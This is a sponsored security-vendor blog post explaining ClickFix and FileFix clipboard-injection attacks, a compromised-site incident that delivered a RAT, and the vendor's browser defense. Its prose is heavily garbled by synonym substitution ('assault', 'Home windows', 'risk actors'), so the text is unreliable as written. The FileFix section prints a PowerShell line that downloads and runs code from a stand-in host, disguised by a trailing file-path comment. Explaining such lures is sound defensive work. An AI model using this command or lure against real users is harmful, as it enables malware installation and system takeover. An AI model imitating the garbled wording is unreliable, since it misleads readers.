An inside have a look at a ClickFix marketing campaign and a real-world assault, its subsequent iteration (FileFix), and how you can forestall it in its tracks, earlier than machine compromise.
ClickFix: Silent Copying to Clipboard
ClickFix, a misleading social engineering tactic, is utilized by risk actors to control unsuspecting customers into unwittingly permitting an internet web page to silently populate the clipboard.
Finally, the attacker is making an attempt to get a person to (unknowingly) execute malicious code, gathered from the browser and quietly positioned into the person’s clipboard, on the host machine.
Coined initially as “ClickFix” as a result of the social engineering prompts had been telling the person they should “repair” an issue with their browser and required the person to click on a component, this time period is now ascribed to any comparable assault, one through which a person clicks a component, the web page then populates the sufferer’s clipboard, and it instructs the person to stick the malicious code into their machine’s terminal.
The above screenshots present an instance ClickFix assault. As soon as the person clicks the pretend CAPTCHA, the web page silently populates the person’s clipboard with malicious code. It then shows directions for the person to show they’re human—by pasting (the malicious code) into the Home windows Run dialog.
For extra details about ClickFix, see our article explaining the what, why, the place, and the way of ClickFix.
Hold Conscious, the purpose-built browser safety platform, detects misleading interactions in actual time, proper the place they occur.
By monitoring clipboard entry patterns, flagging suspicious internet pages, and disrupting lateral motion strategies like ClickFix, Hold Conscious empowers organizations to close down assaults earlier than they ever go away the browser and attain the host.
Actual-World Assault: Google End result to ClickFix Try
A Hold Conscious buyer just lately encountered a ClickFix assault within the wild. Whereas searching search engine outcomes, the person clicked on a compromised web site. This web site, injected with malicious JavaScript, delivered a ClickFix immediate, finally for the aim of deploying the NetSupportManager RAT backdoor.
The person had clicked on the immediate, permitting the web page to populate the clipboard (with malicious PowerShell), and instructing the person to stick into the machine’s terminal.
Nonetheless, Hold Conscious recognized, blocked, and warned the person of the suspicious instructions the web page tried to populate the clipboard with, successfully stopping machine compromise.
The video under walks via what guests expertise on this compromised web site—a pretend CAPTCHA verification body. Upon clicking the pretend CAPTCHA, malicious JavaScript updates the person’s clipboard with malicious PowerShell code and prompts the person to stick it into the Home windows Run dialog.
Beneath is a walkthrough of what would have occurred if Hold Conscious’s safeguards weren’t in place to restrict the person’s actions and clear the person’s clipboard.
If the social engineering tactic had been profitable and no technical controls had been in place, the person would have unknowingly executed malicious PowerShell code.
This kicks of a sequence of downloads, de-obfuscation, assembling malware on the host machine, and organising persistence within the person’s Run registry key—enabling the malware to persist on the compromised machine and run every time the person logs in to their laptop account.
For particular particulars about this real-world assault, together with each the preliminary obtain cradle and the next PowerShell code, take a look at our step-by-step walkthrough.
Affect: RATs, Stealers, and Extra
ClickFix assaults use malicious JavaScript, clipboard manipulation, and social engineering to finally acquire the attacker entry from the browser to the host machine.
It has been seen on each malicious and compromised internet pages and has been utilized by a number of risk teams to achieve entry to sufferer machines, finally deploying malware and distant entry trojans (RATs), together with AsyncRAT, Skuld Stealer, Lumma Stealer, DarkGate malware, DanaBot stealer, and extra.
When left undeterred by technical defenses, these seemingly easy clipboard assaults can escalate into full-system compromise, giving risk actors distant management, entry to delicate knowledge, and chronic footholds which are troublesome to detect and even more durable to take away.
The Subsequent Gen: FileFix
FileFix is the subsequent iteration, the youthful sibling, of ClickFix—one other clipboard-manipulation assault designed to trick customers into executing code outdoors the browser context. First documented by safety researcher mr.d0x in late June this yr, FileFix dupes customers into pasting instructions straight into File Explorer’s tackle bar, and risk actors are already adopting this newer approach.
At a look, the pasted output appears innocent, like a normal Home windows file path. However hidden at first is a malicious command; the “file path” that follows is a remark, disguising the true risk.
Powershell.exe -c "iwr malicious[.]web site/mal.jpg|iex" # C:OrganizationInternalDriveBusiness-RFP.pdfThe complete knowledge copied to the person’s clipboard is a malicious PowerShell command ending in a remark containing a file path.
Discover within the picture under, how the seemingly innocent file path within the Explorer’s tackle bar doesn’t present the precise PowerShell is hidden from the person’s view.
Like ClickFix, the FileFix assault originates within the browser and depends on social engineering, clipboard injection, and person motion to cross the boundary between browser and host. FileFix is, at its core, a ClickFix assault particular to utilizing File Explorer.
- Each occur within the browser context.
- Each use the identical clipboard inhabitants approach.
- Each leverage malicious and compromised web sites, blurring the road between trusted and malicious internet visitors.
- Each result in attacker entry on the host machine.
Because of this FileFix might be stopped the identical method ClickFix is: with browser-native defenses. Browser safety options, like Hold Conscious, detect clipboard inhabitants makes an attempt in real-time and intercept suspicious code earlier than it ever reaches the host machine. This is the reason having insurance policies constructed into the browser ensures that compromises are saved at bay.
Browser Safety Takes the Principal Stage
ClickFix and FileFix assaults reveal a important blind spot in lots of safety methods: the browser as a vector for host compromise. These clipboard-based strategies use social engineering and abuse the person’s interplay with seemingly professional, and even compromised, web sites to ship malicious code.
With out visibility into browser exercise or management over clipboard entry, conventional defenses miss the early indicators. However with browser-native perception and real-time clipboard safety, organizations can intercept these assaults at their supply, earlier than any code is executed on the host.
At Hold Conscious, we’ve seen firsthand how conventional safety instruments fall brief on the subject of defending the browser—the first interface staff depend on and attackers exploit. That’s why we constructed our platform: to detect and block clipboard manipulation and different browser-based assaults earlier than they will trigger actual hurt.
Fascinated with studying extra? Be at liberty to request a demo right here.
Moreover, we’re proud to be named one among simply 4 Black Hat USA 2025 Startup Highlight Finalists for innovation, and we stay dedicated to redefining how organizations safe and handle the browser—the place the place right now’s work begins, and the place right now’s assaults typically begin.
When you’ll be attending Black Hat USA 2025 subsequent week, watch us take the stage to make our pitch, cease by the Hold Conscious sales space, or schedule time to talk with the group on the occasion.
Sponsored and written by Hold Conscious.
